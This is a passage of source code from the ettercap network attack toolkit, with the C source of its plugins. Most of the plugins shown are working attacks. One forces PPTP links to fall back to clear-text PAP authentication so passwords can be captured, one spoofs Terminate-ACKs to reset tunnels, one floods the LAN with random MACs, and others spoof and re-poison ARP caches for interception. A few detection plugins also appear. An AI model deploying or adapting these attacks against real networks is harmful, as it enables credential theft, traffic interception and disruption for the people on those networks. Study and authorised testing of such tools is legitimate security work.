{ /* variable not used */ (void) dummy; /* It doesn't work if unoffensive */ if (EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("pptp_pap: plugin doesn't work in UNOFFENSIVE mode\n"); return PLUGIN_FINISHED; } USER_MSG("pptp_pap: plugin running...\n"); hook_add(HOOK_PACKET_LCP, &parse_ppp); return PLUGIN_RUNNING; } static int pptp_pap_fini(void *dummy) { /* variable not used */ (void) dummy; USER_MSG("pptp_pap: plugin terminated...\n"); hook_del(HOOK_PACKET_LCP, &parse_ppp); return PLUGIN_FINISHED; } /*********************************************************/ /* Modify ConfigureRequest LCP packets */ static void parse_ppp(struct packet_object *po) { struct ppp_lcp_header *lcp; u_int16 *option; char tmp[MAX_ASCII_ADDR_LEN]; /* It is pointless to modify packets that won't be forwarded */ if (!(po->flags & PO_FORWARDABLE)) return; /* PPP decoder placed lcp header in L4 structure. * According to the Hook Point this is an LCP packet. */ lcp = (struct ppp_lcp_header *)po->L4.header; /* Catch only packets that have to be modified */ if ( lcp->code != PPP_CONFIGURE_REQUEST && lcp->code != PPP_CONFIGURE_NAK && lcp->code != PPP_CONFIGURE_REJ) return; if ( (option=(u_int16 *)parse_option((u_char *)(lcp + 1), PPP_AUTH_REQUEST, ntohs(lcp->length) - sizeof(*lcp))) ==NULL) return; if ( option[1] == htons(PPP_REQUEST_PAP) ) return; /* Modify the negotiation */ if ( lcp->code == PPP_CONFIGURE_REJ && option[1] == htons(PPP_DUMMY_REQUEST) ) { /* We assume an original CHAP request that we have converted into DUMMY */ option[1] = htons(PPP_REQUEST_CHAP); } else if (lcp->code == PPP_CONFIGURE_REQUEST) option[1] = htons(PPP_DUMMY_REQUEST); else if (lcp->code == PPP_CONFIGURE_NAK) { option[1] = htons(PPP_REQUEST_PAP); if (!ip_addr_null(&po->L3.dst) && !ip_addr_null(&po->L3.src)) { USER_MSG("pptp_pap: Forced PPP clear text auth %s -> ", ip_addr_ntoa(&po->L3.src, tmp)); USER_MSG("%s\n", ip_addr_ntoa(&po->L3.dst, tmp)); } } } /* Search an option in the packet */ static u_char *parse_option(u_char * buffer, u_char option, int16 tot_len) { /* Avoid never-ending parsing on bogus packets ;) */ char counter=0; while (tot_len>0 && *buffer!=option && counter<20) { tot_len -= buffer[1]; buffer += buffer[1]; counter++; } if (*buffer == option) return buffer; return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/pptp_reneg/000775 000000 000000 00000000000 13711276346 017363 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/pptp_reneg/pptp_reneg.c000664 000000 000000 00000012706 13711276346 021700 0ustar00rootroot000000 000000 /* pptp_reneg -- ettercap plugin -- Forces re-negotiation on an existing PPTP tunnel Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include struct ppp_header { u_char address; u_char control; u_int16 proto; }; struct ppp_lcp_header { u_char code; u_char ident; u_int16 length; }; #define PPP_TERMINATE_ACK 0x06 #define PPP_PROTO_LCP 0xc021 /* Remember what tunnels we have terminated */ struct call_list { struct ip_addr ip[2]; SLIST_ENTRY(call_list) next; }; SLIST_HEAD(, call_list) call_table; /* protos */ int plugin_load(void *); static int pptp_reneg_init(void *); static int pptp_reneg_fini(void *); static void parse_ppp(struct packet_object *po); static int found_in_list(struct packet_object *po); /* plugin operations */ struct plugin_ops pptp_reneg_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "pptp_reneg", /* a short description of the plugin (max 50 chars) */ .info = "PPTP: Forces tunnel re-negotiation", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &pptp_reneg_init, /* deactivation function */ .fini = &pptp_reneg_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &pptp_reneg_ops); } /******************* STANDARD FUNCTIONS *******************/ static int pptp_reneg_init(void *dummy) { /* variable not used */ (void) dummy; /* It doesn't work if unoffensive */ if (EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("pptp_reneg: plugin doesn't work in UNOFFENSIVE mode\n"); return PLUGIN_FINISHED; } USER_MSG("pptp_reneg: plugin running...\n"); hook_add(HOOK_PACKET_PPP, &parse_ppp); return PLUGIN_RUNNING; } static int pptp_reneg_fini(void *dummy) { struct call_list *p; /* variable not used */ (void) dummy; USER_MSG("pptp_reneg: plugin terminated...\n"); hook_del(HOOK_PACKET_PPP, &parse_ppp); /* delete terminated tunnel list */ while (!SLIST_EMPTY(&call_table)) { p = SLIST_FIRST(&call_table); SLIST_REMOVE_HEAD(&call_table, next); SAFE_FREE(p); } return PLUGIN_FINISHED; } /*********************************************************/ /* Force renegotiation by spoofing a Terminate-ACK */ static void parse_ppp(struct packet_object *po) { struct ppp_lcp_header *lcp; struct ppp_header *ppp; char tmp[MAX_ASCII_ADDR_LEN]; /* It is pointless to modify packets that won't be forwarded */ if (!(po->flags & PO_FORWARDABLE)) return; /* Do not terminate same tunnel twice */ if (found_in_list(po)) return; ppp = (struct ppp_header *)po->L4.header; lcp = (struct ppp_lcp_header *)(ppp + 1); /* We assume a new connection...so no reset */ if (ppp->proto == ntohs(PPP_PROTO_LCP)) return; /* Change the packet into a Terminate-ACK */ ppp->proto = htons(PPP_PROTO_LCP); ppp->address = 0xff; ppp->control = 0x3; lcp->code = PPP_TERMINATE_ACK; lcp->ident = 0x01; /* or a higher value */ lcp->length = htons(sizeof(*lcp)); /* Notify the changes to previous decoders */ po->flags |= PO_MODIFIED; /* Use DATA.delta to notify ppp packet len modification */ po->DATA.delta = sizeof(struct ppp_lcp_header) + sizeof(struct ppp_header) - po->L4.len; USER_MSG("pptp_reneg: Forced tunnel re-negotiation %s -> ", ip_addr_ntoa(&po->L3.src, tmp)); USER_MSG("%s\n", ip_addr_ntoa(&po->L3.dst, tmp)); } /* Check if we already terminated this tunnel once */ static int found_in_list(struct packet_object *po) { struct call_list *p; /* Check if the addresses are consistent */ if (ip_addr_null(&po->L3.dst) || ip_addr_null(&po->L3.src)) return 1; /* Check if we already terminated this tunnel once */ SLIST_FOREACH(p, &call_table, next) { if ( (!ip_addr_cmp(&po->L3.src, &p->ip[0]) && !ip_addr_cmp(&po->L3.dst, &p->ip[1])) || (!ip_addr_cmp(&po->L3.src, &p->ip[1]) && !ip_addr_cmp(&po->L3.dst, &p->ip[0])) ) return 1; } SAFE_CALLOC(p, 1, sizeof(struct call_list)); memcpy (&(p->ip[0]), &po->L3.src, sizeof(struct ip_addr)); memcpy (&(p->ip[1]), &po->L3.dst, sizeof(struct ip_addr)); SLIST_INSERT_HEAD(&call_table, p, next); return 0; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/rand_flood/000775 000000 000000 00000000000 13711276346 017327 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/rand_flood/rand_flood.c000664 000000 000000 00000012547 13711276346 021613 0ustar00rootroot000000 000000 /* rand_flood -- ettercap plugin -- Flood the LAN with random MAC addresses Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include #include #include /* globals */ struct eth_header { u_int8 dha[ETH_ADDR_LEN]; /* destination eth addr */ u_int8 sha[ETH_ADDR_LEN]; /* source ether addr */ u_int16 proto; /* packet type ID field */ }; struct arp_header { u_int16 ar_hrd; /* Format of hardware address. */ u_int16 ar_pro; /* Format of protocol address. */ u_int8 ar_hln; /* Length of hardware address. */ u_int8 ar_pln; /* Length of protocol address. */ u_int16 ar_op; /* ARP opcode (command). */ #define ARPOP_REQUEST 1 /* ARP request. */ }; struct arp_eth_header { u_int8 arp_sha[MEDIA_ADDR_LEN]; /* sender hardware address */ u_int8 arp_spa[IP_ADDR_LEN]; /* sender protocol address */ u_int8 arp_tha[MEDIA_ADDR_LEN]; /* target hardware address */ u_int8 arp_tpa[IP_ADDR_LEN]; /* target protocol address */ }; #define FAKE_PCK_LEN sizeof(struct eth_header)+sizeof(struct arp_header)+sizeof(struct arp_eth_header) struct packet_object fake_po; char fake_pck[FAKE_PCK_LEN]; /* protos */ int plugin_load(void *); static int rand_flood_init(void *); static int rand_flood_fini(void *); EC_THREAD_FUNC(flooder); /* plugin operations */ struct plugin_ops rand_flood_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "rand_flood", /* a short description of the plugin (max 50 chars) */ .info = "Flood the LAN with random MAC addresses", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &rand_flood_init, /* deactivation function */ .fini = &rand_flood_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &rand_flood_ops); } /******************* STANDARD FUNCTIONS *******************/ static int rand_flood_init(void *dummy) { /* variable not used */ (void) dummy; /* It doesn't work if unoffensive */ if (EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("rand_flood: plugin doesn't work in UNOFFENSIVE mode\n"); return PLUGIN_FINISHED; } INSTANT_USER_MSG("rand_flood: Start flooding the LAN...\n"); /* create the flooding thread */ ec_thread_new("flooder", "Random flooder thread", &flooder, NULL); return PLUGIN_RUNNING; } static int rand_flood_fini(void *dummy) { pthread_t pid; /* variable not used */ (void) dummy; pid = ec_thread_getpid("flooder"); /* the thread is active or not ? */ if (!pthread_equal(pid, ec_thread_getpid(NULL))) ec_thread_destroy(pid); INSTANT_USER_MSG("rand_flood: plugin stopped...\n"); return PLUGIN_FINISHED; } EC_THREAD_FUNC(flooder) { struct timeval seed; struct eth_header *heth; struct arp_header *harp; u_int32 rnd; u_char MACS[ETH_ADDR_LEN], MACD[ETH_ADDR_LEN]; /* variable not used */ (void) EC_THREAD_PARAM; /* Get a "random" seed */ gettimeofday(&seed, NULL); srandom(seed.tv_sec ^ seed.tv_usec); /* Create a fake ARP packet */ heth = (struct eth_header *)fake_pck; harp = (struct arp_header *)(heth + 1); heth->proto = htons(LL_TYPE_ARP); harp->ar_hrd = htons(ARPHRD_ETHER); harp->ar_pro = htons(ETHERTYPE_IP); harp->ar_hln = 6; harp->ar_pln = 4; harp->ar_op = htons(ARPOP_REQUEST); packet_create_object(&fake_po, (u_char*)fake_pck, FAKE_PCK_LEN); /* init the thread and wait for start up */ ec_thread_init(); LOOP { CANCELLATION_POINT(); rnd = random(); memcpy(MACS, &rnd, 4); rnd = random(); memcpy(MACS + 4, &rnd, 2); rnd = random(); memcpy(MACD, &rnd, 4); rnd = random(); memcpy(MACD + 4, &rnd, 2); /* Fill the source and destination MAC address * with random values */ memcpy(heth->dha, MACD, ETH_ADDR_LEN); memcpy(heth->sha, MACS, ETH_ADDR_LEN); /* Send on the wire and wait */ send_to_L2(&fake_po); ec_usleep(EC_GBL_CONF->port_steal_send_delay); } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/remote_browser/000775 000000 000000 00000000000 13711276346 020256 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/remote_browser/remote_browser.c000664 000000 000000 00000015612 13711276346 023465 0ustar00rootroot000000 000000 /* remote_browser -- ettercap plugin -- send to the browser the sniffed websites Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include #include #include /* protos */ int plugin_load(void *); static int remote_browser_init(void *); static int remote_browser_fini(void *); static void remote_browser(struct packet_object *po); static int good_page(char *str); /* plugin operations */ struct plugin_ops remote_browser_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "remote_browser", /* a short description of the plugin (max 50 chars) */ .info = "Sends visited URLs to the browser", /* the plugin version. */ .version = "1.2", /* activation function */ .init = &remote_browser_init, /* deactivation function */ .fini = &remote_browser_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &remote_browser_ops); } /*********************************************************/ static int remote_browser_init(void *dummy) { /* variable not used */ (void) dummy; /* * add the hook in the dissector. */ hook_add(HOOK_PROTO_HTTP, &remote_browser); return PLUGIN_RUNNING; } static int remote_browser_fini(void *dummy) { /* variable not used */ (void) dummy; /* remove the hook */ hook_del(HOOK_PROTO_HTTP, &remote_browser); return PLUGIN_FINISHED; } /* * parse the packet and send the fake reply */ static void remote_browser(struct packet_object *po) { char *tmp, *p, *q; char *url, *host; char *command; char **param = NULL; int i = 0, k = 0; /* the client is making a request */ if (po->DATA.disp_len != 0 && strstr((const char*)po->DATA.disp_data, "GET")) { /* I'm the sender, opening a browser with a request coming by me will trigger a loop in this function! */ if(ip_addr_is_ours(&po->L3.src) == E_FOUND || ip_addr_is_ours(&po->L3.src) == E_BRIDGE) return; /* I'm not the sender, I can safely open the browser, the GET triggered by it shouldn't cause bad effects */ tmp = strdup((const char*)po->DATA.disp_data); /* get the Host: directive */ host = strstr(tmp, "Host: "); if (host != NULL) { host = host + 6; // 6 is like strlen("Host: "); if ((p = strstr(host, "\r\n")) != NULL) *p = 0; } else goto bad; /* null terminate the request before the HTTP/x.x */ p = strstr(tmp, " HTTP"); if (p != NULL) *p = 0; else goto bad; /* get the requested url */ url = tmp + 4; // 4 is like strlen("GET "); /* parse only pages, not images or other amenities */ if (!good_page(url)) goto bad; /* fill the command */ command = strdup(EC_GBL_CONF->remote_browser); str_replace(&command, "%host", host); str_replace(&command, "%url", url); USER_MSG("REMOTE COMMAND: %s\n", command); /* split the string in the parameter array */ for (p = ec_strtok(command, " ", &q); p != NULL; p = ec_strtok(NULL, " ", &q)) { /* allocate the array */ SAFE_REALLOC(param, (i + 1) * sizeof(char *)); /* copy the tokens in the array */ param[i++] = strdup(p); } /* NULL terminate the array */ SAFE_REALLOC(param, (i + 1) * sizeof(char *)); param[i] = NULL; /* execute the script */ if (fork() == 0) { /* chrome won't start as root, changing UID in order to prevent this and for more security in the browser context */ /* the following line has been commented since some Penetration Testing distros can run only as root */ /*setuid(1000);*/ u_int uid, gid; DEBUG_MSG("drop_privs: getuid(%d) \n", getuid()); /* are we root ? */ if (getuid() == 0) { gid = uid = 1000; DEBUG_MSG("drop_privs: setuid(%d) setgid(%d)\n", uid, gid); /* drop to a good uid/gid ;) */ if ( setgid(gid) < 0 ) DEBUG_MSG("setgid() FAILED\n"); if ( setuid(uid) < 0 ) DEBUG_MSG("setuid() FAILED\n"); DEBUG_MSG("privs: UID: %d %d GID: %d %d\n", (int)getuid(), (int)geteuid(), (int)getgid(), (int)getegid() ); DEBUG_MSG("Privileges dropped to UID %d GID %d...\n\n", (int)getuid(), (int)getgid() ); /* "nobody" cannot open a browser */ } else if(getuid() == 65535) WARN_MSG("your ec_gid and ec_uid in etter.conf file are set to nobody (65535), you probably cannot open a new browser\n"); execvp(param[0], param); WARN_MSG("Cannot launch the default browser (command: %s), please edit your etter.conf file and put a valid value in remote_browser field\n", EC_GBL_CONF->remote_browser); _exit(-E_INVALID); } //to free the char **param for(k= 0; k < i; ++k) SAFE_FREE(param[k]); SAFE_FREE(param); SAFE_FREE(command); bad: SAFE_FREE(tmp); } } /* * return true if the requested URL has to be passed to * the REMOTE_COMMAND */ static int good_page(char *str) { int i; char *suffixes[] = { ".htm", ".html", ".shtml", ".phtml", ".dhtml", ".php", ".asp", ".pl", ".py", ".jsp", NULL}; /* special case if we are requesting the root */ if (!strcmp(str, "/")) return 1; /* we are requesting a directory */ if (str[strlen(str)-1] == '/') return 1; /* search a valid suffix */ for (i = 0; suffixes[i]; i++) { if (strcasestr(str, suffixes[i])) { printf("suff %s\n", suffixes[i]); return 1; } } return 0; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/reply_arp/000775 000000 000000 00000000000 13711276346 017215 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/reply_arp/reply_arp.c000664 000000 000000 00000006450 13711276346 021363 0ustar00rootroot000000 000000 /* reply_arp -- ettercap plugin -- Simple arp responder Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include /* protos */ int plugin_load(void *); static int reply_arp_init(void *); static int reply_arp_fini(void *); static void parse_arp(struct packet_object *po); /* plugin operations */ struct plugin_ops reply_arp_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "reply_arp", /* a short description of the plugin (max 50 chars) */ .info = "Simple arp responder", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &reply_arp_init, /* deactivation function */ .fini = &reply_arp_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &reply_arp_ops); } /******************* STANDARD FUNCTIONS *******************/ static int reply_arp_init(void *dummy) { /* variable not used */ (void) dummy; /* It doesn't work if unoffensive */ if (EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("reply_arp: plugin doesn't work in UNOFFENSIVE mode\n"); return PLUGIN_FINISHED; } hook_add(HOOK_PACKET_ARP_RQ, &parse_arp); return PLUGIN_RUNNING; } static int reply_arp_fini(void *dummy) { /* variable not used */ (void) dummy; USER_MSG("reply_arp: plugin terminated...\n"); hook_del(HOOK_PACKET_ARP_RQ, &parse_arp); return PLUGIN_FINISHED; } /*********************************************************/ /* Reply to requests for hosts in the target lists */ static void parse_arp(struct packet_object *po) { struct ip_list *i; int in_list = 0; if (EC_GBL_TARGET1->scan_all || EC_GBL_TARGET2->scan_all) in_list = 1; LIST_FOREACH(i, &EC_GBL_TARGET1->ips, next) { if (!ip_addr_cmp(&i->ip, &po->L3.dst)) { in_list = 1; break; } } LIST_FOREACH(i, &EC_GBL_TARGET2->ips, next) { if (!ip_addr_cmp(&i->ip, &po->L3.dst)) { in_list = 1; break; } } if (in_list) send_arp(ARPOP_REPLY, &po->L3.dst, EC_GBL_IFACE->mac, &po->L3.src, po->L2.src); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/repoison_arp/000775 000000 000000 00000000000 13711276346 017720 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/repoison_arp/repoison_arp.c000664 000000 000000 00000010726 13711276346 022572 0ustar00rootroot000000 000000 /* repoison_arp -- ettercap plugin -- Repoison after a broadcast ARP Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include #include #include /* protos */ int plugin_load(void *); static int repoison_arp_init(void *); static int repoison_arp_fini(void *); static void repoison_func(struct packet_object *po); void repoison_victims(void *group_ptr, struct packet_object *po); /* plugin operations */ struct plugin_ops repoison_arp_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "repoison_arp", /* a short description of the plugin (max 50 chars) */ .info = "Repoison after broadcast ARP", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &repoison_arp_init, /* deactivation function */ .fini = &repoison_arp_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &repoison_arp_ops); } /******************* STANDARD FUNCTIONS *******************/ static int repoison_arp_init(void *dummy) { /* variable not used */ (void) dummy; /* It doesn't work if unoffensive */ if (EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("repoison_arp: plugin doesn't work in UNOFFENSIVE mode\n"); return PLUGIN_FINISHED; } hook_add(HOOK_PACKET_ARP_RQ, &repoison_func); hook_add(HOOK_PACKET_ARP_RP, &repoison_func); return PLUGIN_RUNNING; } static int repoison_arp_fini(void *dummy) { /* variable not used */ (void) dummy; USER_MSG("repoison_arp: plugin terminated...\n"); hook_del(HOOK_PACKET_ARP_RQ, &repoison_func); hook_del(HOOK_PACKET_ARP_RP, &repoison_func); return PLUGIN_FINISHED; } /*********************************************************/ /* Poison one target list */ void repoison_victims(void *group_ptr, struct packet_object *po) { struct hosts_list *t; LIST_HEAD(, hosts_list) *group_head = group_ptr; LIST_FOREACH(t, group_head, next) { ec_usleep(MILLI2MICRO(EC_GBL_CONF->arp_storm_delay)); /* equal ip must be skipped, you cant poison itself */ if (!ip_addr_cmp(&t->ip, &po->L3.src)) continue; if (!EC_GBL_CONF->arp_poison_equal_mac) /* skip even equal mac address... */ if (!memcmp(t->mac, po->L2.src, MEDIA_ADDR_LEN)) continue; if (EC_GBL_CONF->arp_poison_reply) send_arp(ARPOP_REPLY, &po->L3.src, EC_GBL_IFACE->mac, &t->ip, t->mac); if (EC_GBL_CONF->arp_poison_request) send_arp(ARPOP_REQUEST, &po->L3.src, EC_GBL_IFACE->mac, &t->ip, t->mac); } } /* Re-poison caches that update on legal broadcast ARP requests */ static void repoison_func(struct packet_object *po) { struct hosts_list *t; /* if arp poisonin is not running, do nothing */ if (!is_mitm_active("arp")) return; /* Check the target address */ if (memcmp(po->L2.dst, ARP_BROADCAST, MEDIA_ADDR_LEN)) return; /* search in target 2 */ LIST_FOREACH(t, &arp_group_two, next) if (!ip_addr_cmp(&t->ip, &po->L3.src)) { repoison_victims(&arp_group_one, po); break; } /* search in target 1 */ LIST_FOREACH(t, &arp_group_one, next) if (!ip_addr_cmp(&t->ip, &po->L3.src)) { repoison_victims(&arp_group_two, po); break; } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/scan_poisoner/000775 000000 000000 00000000000 13711276346 020062 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/scan_poisoner/scan_poisoner.c000664 000000 000000 00000014314 13711276346 023073 0ustar00rootroot000000 000000 /* scan_poisoner -- ettercap plugin -- Actively search other poisoners It checks the hosts list, searching for eqaul mac addresses. It also sends icmp packets to see if any ip-mac association has changed. Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include #include /* globals */ char flag_strange; /* mutexes */ static pthread_mutex_t scan_poisoner_mutex = PTHREAD_MUTEX_INITIALIZER; /* protos */ int plugin_load(void *); static int scan_poisoner_init(void *); static EC_THREAD_FUNC(scan_poisoner_thread); static int scan_poisoner_fini(void *); static void parse_icmp(struct packet_object *po); /* plugin operations */ struct plugin_ops scan_poisoner_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "scan_poisoner", /* a short description of the plugin (max 50 chars) */ .info = "Actively search other poisoners", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &scan_poisoner_init, /* deactivation function */ .fini = &scan_poisoner_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &scan_poisoner_ops); } /******************* STANDARD FUNCTIONS *******************/ static int scan_poisoner_init(void *dummy) { /* variable not used */ (void) dummy; ec_thread_new("scan_poisoner", "plugin scan_poisoner", &scan_poisoner_thread, NULL); return PLUGIN_RUNNING; } static EC_THREAD_FUNC(scan_poisoner_thread) { /* variable not used */ (void) EC_THREAD_PARAM; char tmp1[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; struct hosts_list *h1, *h2; ec_thread_init(); PLUGIN_LOCK(scan_poisoner_mutex); /* don't show packets while operating */ EC_GBL_OPTIONS->quiet = 1; if (LIST_EMPTY(&EC_GBL_HOSTLIST)) { INSTANT_USER_MSG("scan_poisoner: You have to build host-list to run this plugin.\n\n"); PLUGIN_UNLOCK(scan_poisoner_mutex); plugin_kill_thread("scan_poisoner", "scan_poisoner"); return PLUGIN_FINISHED; } INSTANT_USER_MSG("scan_poisoner: Checking hosts list...\n"); flag_strange = 0; /* Compares mac address of each host with any other */ LIST_FOREACH(h1, &EC_GBL_HOSTLIST, next) for(h2=LIST_NEXT(h1,next); h2!=LIST_END(&EC_GBL_HOSTLIST); h2=LIST_NEXT(h2,next)) if (!memcmp(h1->mac, h2->mac, MEDIA_ADDR_LEN)) { flag_strange = 1; INSTANT_USER_MSG("scan_poisoner: - %s and %s have same MAC address\n", ip_addr_ntoa(&h1->ip, tmp1), ip_addr_ntoa(&h2->ip, tmp2)); } if (!flag_strange) INSTANT_USER_MSG("scan_poisoner: - Nothing strange\n"); flag_strange=0; /* Can't continue in unoffensive */ if (EC_GBL_OPTIONS->unoffensive || EC_GBL_OPTIONS->read) { INSTANT_USER_MSG("\nscan_poisoner: Can't make active test in UNOFFENSIVE mode.\n\n"); PLUGIN_UNLOCK(scan_poisoner_mutex); plugin_kill_thread("scan_poisoner", "scan_poisoner"); return PLUGIN_FINISHED; } INSTANT_USER_MSG("\nscan_poisoner: Actively searching poisoners...\n"); /* Add the hook to collect ICMP replies from the victim */ hook_add(HOOK_PACKET_ICMP, &parse_icmp); /* Send ICMP echo request to each target */ LIST_FOREACH(h1, &EC_GBL_HOSTLIST, next) { send_L3_icmp_echo(&EC_GBL_IFACE->ip, &h1->ip); ec_usleep(MILLI2MICRO(EC_GBL_CONF->arp_storm_delay)); } /* wait for the response */ ec_usleep(SEC2MICRO(1)); /* remove the hook */ hook_del(HOOK_PACKET_ICMP, &parse_icmp); /* We don't need mutex on it :) */ if (!flag_strange) INSTANT_USER_MSG("scan_poisoner: - Nothing strange\n"); PLUGIN_UNLOCK(scan_poisoner_mutex); plugin_kill_thread("scan_poisoner", "scan_poisoner"); return PLUGIN_FINISHED; } static int scan_poisoner_fini(void *dummy) { /* variable not used */ (void) dummy; pthread_t pid; pid = ec_thread_getpid("scan_poisoner"); if (!pthread_equal(pid, ec_thread_getpid(NULL))) ec_thread_destroy(pid); INSTANT_USER_MSG("scan_poisoner: plugin terminated...\n"); return PLUGIN_FINISHED; } /*********************************************************/ /* Check icmp replies */ static void parse_icmp(struct packet_object *po) { struct hosts_list *h1, *h2; char poisoner[MAX_ASCII_ADDR_LEN]; char tmp[MAX_ASCII_ADDR_LEN]; /* If the poisoner is not in the hosts list */ sprintf(poisoner, "UNKNOWN"); /* Check if the reply contains the correct ip/mac association */ LIST_FOREACH(h1, &EC_GBL_HOSTLIST, next) { if (!ip_addr_cmp(&(po->L3.src), &h1->ip) && memcmp(po->L2.src, h1->mac, MEDIA_ADDR_LEN)) { flag_strange = 1; /* Check if the mac address of the poisoner is in the hosts list */ LIST_FOREACH(h2, &EC_GBL_HOSTLIST, next) if (!memcmp(po->L2.src, h2->mac, MEDIA_ADDR_LEN)) ip_addr_ntoa(&h2->ip, poisoner); INSTANT_USER_MSG("scan_poisoner: - %s is replying for %s\n", poisoner, ip_addr_ntoa(&h1->ip, tmp)); } } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/search_promisc/000775 000000 000000 00000000000 13711276346 020221 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/search_promisc/search_promisc.c000664 000000 000000 00000014557 13711276346 023402 0ustar00rootroot000000 000000 /* search_promisc -- ettercap plugin -- Search promisc NICs in the LAN It sends malformed arp reqeusts and waits for replies. Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 